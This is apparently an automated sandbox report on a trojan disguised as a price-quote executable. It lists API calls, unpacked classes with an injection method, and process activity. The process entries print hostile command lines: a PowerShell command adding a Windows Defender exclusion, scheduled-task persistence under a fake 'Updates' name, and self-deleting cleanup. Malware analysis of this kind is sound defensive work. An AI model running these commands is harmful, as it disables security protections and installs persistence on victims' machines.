Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04923FD5	17_2_04923FD5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1FF09	17_2_04A1FF09
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049638E0	17_2_049638E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049CD800	17_2_049CD800
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049F5910	17_2_049F5910
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04969950	17_2_04969950
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0497B950	17_2_0497B950
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A01AA3	17_2_04A01AA3
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049FDAAC	17_2_049FDAAC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049A5AA0	17_2_049A5AA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A0DAC6	17_2_04A0DAC6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A17A46	17_2_04A17A46
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1FA49	17_2_04A1FA49
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049D3A6C	17_2_049D3A6C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0497FB80	17_2_0497FB80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0499DBF9	17_2_0499DBF9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049D5BF0	17_2_049D5BF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1FB76	17_2_04A1FB76
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_00802D89	17_2_00802D89
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_00802D90	17_2_00802D90
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_00802FB0	17_2_00802FB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_00809E4B	17_2_00809E4B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_00809E50	17_2_00809E50

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: String function: 01A97E54 appears 110 times
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: String function: 01ACF290 appears 105 times
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: String function: 01ABEA12 appears 86 times
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: String function: 01A3B970 appears 280 times
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: String function: 01A85130 appears 58 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 04995130 appears 58 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 049DF290 appears 105 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 0494B970 appears 280 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 049A7E54 appears 110 times
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: String function: 049CEA12 appears 86 times
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: String function: 019B7E54 appears 97 times
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: String function: 019DEA12 appears 37 times

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041A320 NtCreateFile,	10_2_0041A320
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041A3D0 NtReadFile,	10_2_0041A3D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041A450 NtClose,	10_2_0041A450
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041A500 NtAllocateVirtualMemory,	10_2_0041A500
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041A372 NtCreateFile,	10_2_0041A372
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041A3CA NtReadFile,	10_2_0041A3CA
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_0041A44A NtClose,	10_2_0041A44A
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	10_2_01A82BF0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82DF0 NtQuerySystemInformation,LdrInitializeThunk,	10_2_01A82DF0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82C70 NtFreeVirtualMemory,LdrInitializeThunk,	10_2_01A82C70
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A84340 NtSetContextThread,	10_2_01A84340
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A84650 NtSuspendThread,	10_2_01A84650
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82BA0 NtEnumerateValueKey,	10_2_01A82BA0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82B80 NtQueryInformationFile,	10_2_01A82B80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82BE0 NtQueryValueKey,	10_2_01A82BE0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82B60 NtClose,	10_2_01A82B60
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82AB0 NtWaitForSingleObject,	10_2_01A82AB0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82AF0 NtWriteFile,	10_2_01A82AF0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82AD0 NtReadFile,	10_2_01A82AD0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82DB0 NtEnumerateKey,	10_2_01A82DB0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82DD0 NtDelayExecution,	10_2_01A82DD0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82D30 NtUnmapViewOfSection,	10_2_01A82D30
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82D00 NtSetInformationFile,	10_2_01A82D00
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82D10 NtMapViewOfSection,	10_2_01A82D10
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82CA0 NtQueryInformationToken,	10_2_01A82CA0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82CF0 NtOpenProcess,	10_2_01A82CF0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82CC0 NtQueryVirtualMemory,	10_2_01A82CC0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82C00 NtQueryInformationProcess,	10_2_01A82C00
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82C60 NtCreateKey,	10_2_01A82C60
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82FA0 NtQuerySection,	10_2_01A82FA0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82FB0 NtResumeThread,	10_2_01A82FB0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82F90 NtProtectVirtualMemory,	10_2_01A82F90
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82FE0 NtCreateFile,	10_2_01A82FE0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82F30 NtCreateSection,	10_2_01A82F30
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82F60 NtCreateProcessEx,	10_2_01A82F60
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82EA0 NtAdjustPrivilegesToken,	10_2_01A82EA0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82E80 NtReadVirtualMemory,	10_2_01A82E80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82EE0 NtQueueApcThread,	10_2_01A82EE0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82E30 NtWriteVirtualMemory,	10_2_01A82E30
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A83090 NtSetValueKey,	10_2_01A83090
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A83010 NtOpenDirectoryObject,	10_2_01A83010
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A835C0 NtCreateMutant,	10_2_01A835C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A839B0 NtGetContextThread,	10_2_01A839B0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A83D10 NtOpenProcessToken,	10_2_01A83D10
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A83D70 NtOpenThread,	10_2_01A83D70
Source: C:\Windows\explorer.exe	Code function: 16_2_10173E12 NtProtectVirtualMemory,	16_2_10173E12
Source: C:\Windows\explorer.exe	Code function: 16_2_10172232 NtCreateFile,	16_2_10172232
Source: C:\Windows\explorer.exe	Code function: 16_2_10173E0A NtProtectVirtualMemory,	16_2_10173E0A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992CA0 NtQueryInformationToken,LdrInitializeThunk,	17_2_04992CA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992C70 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_04992C70
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992C60 NtCreateKey,LdrInitializeThunk,	17_2_04992C60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992DD0 NtDelayExecution,LdrInitializeThunk,	17_2_04992DD0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992DF0 NtQuerySystemInformation,LdrInitializeThunk,	17_2_04992DF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992D10 NtMapViewOfSection,LdrInitializeThunk,	17_2_04992D10
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_04992EA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992FE0 NtCreateFile,LdrInitializeThunk,	17_2_04992FE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992F30 NtCreateSection,LdrInitializeThunk,	17_2_04992F30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992AD0 NtReadFile,LdrInitializeThunk,	17_2_04992AD0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_04992BF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992BE0 NtQueryValueKey,LdrInitializeThunk,	17_2_04992BE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992B60 NtClose,LdrInitializeThunk,	17_2_04992B60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049935C0 NtCreateMutant,LdrInitializeThunk,	17_2_049935C0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04994650 NtSuspendThread,	17_2_04994650
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04994340 NtSetContextThread,	17_2_04994340
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992CC0 NtQueryVirtualMemory,	17_2_04992CC0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992CF0 NtOpenProcess,	17_2_04992CF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992C00 NtQueryInformationProcess,	17_2_04992C00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992DB0 NtEnumerateKey,	17_2_04992DB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992D00 NtSetInformationFile,	17_2_04992D00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992D30 NtUnmapViewOfSection,	17_2_04992D30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992E80 NtReadVirtualMemory,	17_2_04992E80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992EE0 NtQueueApcThread,	17_2_04992EE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992E30 NtWriteVirtualMemory,	17_2_04992E30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992F90 NtProtectVirtualMemory,	17_2_04992F90
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992FB0 NtResumeThread,	17_2_04992FB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992FA0 NtQuerySection,	17_2_04992FA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992F60 NtCreateProcessEx,	17_2_04992F60
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992AB0 NtWaitForSingleObject,	17_2_04992AB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992AF0 NtWriteFile,	17_2_04992AF0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992B80 NtQueryInformationFile,	17_2_04992B80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04992BA0 NtEnumerateValueKey,	17_2_04992BA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04993090 NtSetValueKey,	17_2_04993090
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04993010 NtOpenDirectoryObject,	17_2_04993010
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04993D10 NtOpenProcessToken,	17_2_04993D10
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04993D70 NtOpenThread,	17_2_04993D70
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049939B0 NtGetContextThread,	17_2_049939B0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0081A3D0 NtReadFile,	17_2_0081A3D0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0081A320 NtCreateFile,	17_2_0081A320
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0081A450 NtClose,	17_2_0081A450
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0081A500 NtAllocateVirtualMemory,	17_2_0081A500
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0081A3CA NtReadFile,	17_2_0081A3CA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0081A372 NtCreateFile,	17_2_0081A372
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0081A44A NtClose,	17_2_0081A44A

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, 00000001.00000002.1500364423.0000000008C90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, 00000001.00000002.1496366003.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, 0000000A.00000002.1478575359.0000000001B3D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Binary or memory string: OriginalFilenameUGGs.exe" vs IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ySqETqNvdTbE.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	ReversingLabs: Detection: 57%
Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Virustotal: Detection: 65%

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

File read: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Jump to behavior

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmpF7.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process created: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmp17EA.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process created: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmpF7.tmp	Jump to behavior
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Process created: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmp17EA.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Process created: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe"	Jump to behavior

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

File created: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe

Jump to behavior

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

File created: C:\Users\user\AppData\Local\Temp\tmpF7.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@20/12@11/8

Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.2c51c54.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 11.2.ySqETqNvdTbE.exe.2d81bb8.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.5760000.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, QfC3wLMCnmhmSnTrhZ.cs	Security API names: _0020.SetAccessControl
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, QfC3wLMCnmhmSnTrhZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, QfC3wLMCnmhmSnTrhZ.cs	Security API names: _0020.AddAccessRule
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, jqAVqu20xu22mWTJL3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, QfC3wLMCnmhmSnTrhZ.cs	Security API names: _0020.SetAccessControl
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, QfC3wLMCnmhmSnTrhZ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.8c90000.5.raw.unpack, QfC3wLMCnmhmSnTrhZ.cs	Security API names: _0020.AddAccessRule
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.3fa4ff0.2.raw.unpack, jqAVqu20xu22mWTJL3.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Mutant created: \Sessions\1\BaseNamedObjects\PkyCZCiuJjVFkO
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03

Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.2c34184.0.raw.unpack, Wc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.2c34184.0.raw.unpack, Wc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.5800000.4.raw.unpack, Wc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.5800000.4.raw.unpack, Wc.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.5760000.3.raw.unpack, Ft.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.2c51c54.1.raw.unpack, Ft.cs	Cryptographic APIs: 'CreateDecryptor'
